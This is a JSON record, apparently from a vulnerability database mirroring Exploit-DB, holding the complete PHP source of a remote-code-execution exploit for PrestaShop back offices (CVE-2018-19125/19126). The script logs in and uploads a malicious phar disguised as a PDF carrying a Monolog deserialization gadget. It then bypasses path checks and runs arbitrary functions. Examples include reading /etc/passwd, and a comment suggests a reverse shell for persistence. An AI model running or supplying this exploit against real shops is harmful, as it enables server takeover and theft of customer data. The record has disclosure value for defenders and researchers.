"NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-19125", "CVE-2018-19126", "2018-19126", "2018-19125"], "modified": "2018-12-11T00:00:00", "id": "EDB-ID:45964", "href": "https://www.exploit-db.com/exploits/45964", "sourceData": "<?php\r\n/**\r\n * \r\n * PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution\r\n * See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation.\r\n * \r\n * Chaining multiple vulnerabilities to trigger deserialization via phar.\r\n *\r\n * Date:\r\n * December 1st, 2018\r\n *\r\n * Author:\r\n * farisv\r\n *\r\n * Vendor Homepage:\r\n * https://www.prestashop.com/\r\n *\r\n * Vulnerable Package Link:\r\n * https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip\r\n *\r\n * CVE :\r\n * - CVE-2018-19126\r\n * - CVE-2018-19125\r\n * \r\n * Prerequisite:\r\n * - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.\r\n * - Back Office account (logistician, translator, salesman, etc.).\r\n * \r\n * Usage:\r\n * php exploit.php back-office-url email password func param\r\n * \r\n * Example:\r\n * php exploit.php http://127.0.0.1/admin-dev/ salesman@shop.com 54l35m4n123\r\n * system 'cat /etc/passwd'\r\n * \r\n * Note:\r\n * Note that the upload directory will be renamed and you can't upload the\r\n * malicious phar file again if the folder name is not reverted. You might want\r\n * to execute reverse shell to gain persistence RCE or include the command to\r\n * rename the folder again in your payload (you need to know the path to the\r\n * upload directory).\r\n * \r\n * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.\r\n * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.\r\n * \r\n */\r\n\r\nnamespace PrestaShopRCE {\r\n\r\n class Exploit {\r\n private $url;\r\n private $email;\r\n private $passwd;\r\n private $cmd;\r\n private $func;\r\n private $param;\r\n\r\n public function __construct($url, $email, $passwd, $func, $param) {\r\n $this->url = $url;\r\n $this->email = $email;\r\n $this->passwd = $passwd;\r\n $this->func = $func;\r\n $this->param = $param;\r\n }\r\n\r\n private function post($path, $data, $cookie) {\r\n $curl_handle = curl_init();\r\n \r\n $options = array(\r\n CURLOPT_URL => $this->url . $path,\r\n CURLOPT_HEADER => true,\r\n CURLOPT_POST => 1,\r\n CURLOPT_POSTFIELDS => $data,\r\n CURLOPT_RETURNTRANSFER => true,\r\n CURLOPT_COOKIE => $cookie\r\n );\r\n \r\n curl_setopt_array($curl_handle, $options);\r\n $raw = curl_exec($curl_handle);\r\n curl_close($curl_handle);\r\n\r\n return $raw;\r\n }\r\n\r\n private function fetch_cookie($raw) {\r\n $header = \"Set-Cookie: \";\r\n $cookie_header_start = strpos($raw, $header);\r\n $sliced_part = substr($raw, $cookie_header_start + strlen($header));\r\n $cookie = substr($sliced_part, 0, strpos($sliced_part, ';'));\r\n return $cookie;\r\n }\r\n\r\n public function run() {\r\n\r\n // Login and get PrestaShop cookie\r\n $data = array(\r\n 'email' => $this->email,\r\n 'passwd' => $this->passwd,\r\n 'submitLogin' => '1',\r\n 'controller' => 'AdminLogin',\r\n 'ajax' => '1'\r\n );\r\n $cookie = \"\";\r\n $raw = $this->post('/', $data, $cookie);\r\n $prestashop_cookie = $this->fetch_cookie($raw);\r\n\r\n // Get FileManager cookie\r\n $data = array();\r\n $cookie = $prestashop_cookie;\r\n $raw = $this->post('/filemanager/dialog.php', $data, $cookie);\r\n $filemanager_cookie = $this->fetch_cookie($raw);\r\n\r\n // Craft deserialization gadget\r\n $gadget = new \\Monolog\\Handler\\SyslogUdpHandler(\r\n new \\Monolog\\Handler\\BufferHandler(\r\n ['current', $this->func],\r\n [$this->param, 'level' => null]\r\n )\r\n );\r\n\r\n // Craft malicious phar file\r\n $phar = new \\Phar('phar.phar');\r\n $phar->startBuffering();\r\n $phar->addFromString('test', 'test');\r\n $phar->setStub('<?php __HALT_COMPILER(); ? >');\r\n $phar->setMetadata($gadget);\r\n $phar->stopBuffering();\r\n\r\n // Change the extension\r\n rename('phar.phar', 'phar.pdf');\r\n\r\n // Cookie for next requests\r\n $cookie = \"$prestashop_cookie; $filemanager_cookie\";\r\n\r\n // Upload phar.pdf\r\n $curl_file = new \\CurlFile('phar.pdf', 'application/pdf', 'phar.pdf');\r\n $data = array(\r\n 'file' => $curl_file\r\n );\r\n $raw = $this->post('/filemanager/upload.php', $data, $cookie);\r\n\r\n // Rename image directory to bypass realpath() check\r\n $data = array(\r\n 'name' => 'renamed'\r\n );\r\n $raw = $this->post(\r\n '/filemanager/execute.php?action=rename_folder',\r\n $data,\r\n $cookie\r\n );\r\n\r\n // Trigger deserialization\r\n // The '/img/cms/' substring is important to bypass string check\r\n $data = array(\r\n 'path' => 'phar://../../img/renamed/phar.pdf/img/cms/'\r\n );\r\n $raw = $this->post(\r\n '/filemanager/ajax_calls.php?action=image_size',\r\n $data,\r\n $cookie\r\n );\r\n\r\n // Display the raw result\r\n print $raw;\r\n\r\n }\r\n }\r\n\r\n}\r\n\r\n/*\r\n * Based on\r\n * https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/\r\n*/\r\nnamespace Monolog\\Handler {\r\n\r\n class SyslogUdpHandler {\r\n protected $socket;\r\n\r\n function __construct($param) {\r\n $this->socket = $param;\r\n }\r\n }\r\n\r\n class BufferHandler {\r\n protected $handler;\r\n protected $bufferSize = -1;\r\n protected $buffer;\r\n protected $level = null;\r\n protected $initialized = true;\r\n protected $bufferLimit = -1;\r\n protected $processors;\r\n\r\n function __construct($methods, $command) {\r\n $this->processors = $methods;\r\n $this->buffer = [$command];\r\n $this->handler = clone $this;\r\n }\r\n }\r\n\r\n}\r\n\r\nnamespace {\r\n\r\n if (count($argv) != 6) {\r\n $hint = \"Usage:\\n php $argv[0] back-office-url email password func param\\n\\n\";\r\n $hint .= \"Example:\\n php $argv[0] http://127.0.0.1/admin-dev/ \";\r\n $hint .= \"salesman@shop.com 54l35m4n123 system 'uname -a'\";\r\n die($hint);\r\n }\r\n\r\n if (!extension_loaded('curl')) {\r\n die('Need php-curl');\r\n }\r\n\r\n $url = $argv[1];\r\n $email = $argv[2];\r\n $passwd = $argv[3];\r\n $func = $argv[4];\r\n $param = $argv[5];\r\n\r\n $exploit = new PrestaShopRCE\\Exploit($url, $email, $passwd, $func, $param);\r\n $exploit->run();\r\n\r\n}", "sourceHref": "https://www.exploit-db.com/download/45964", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
CVE-2018-19126
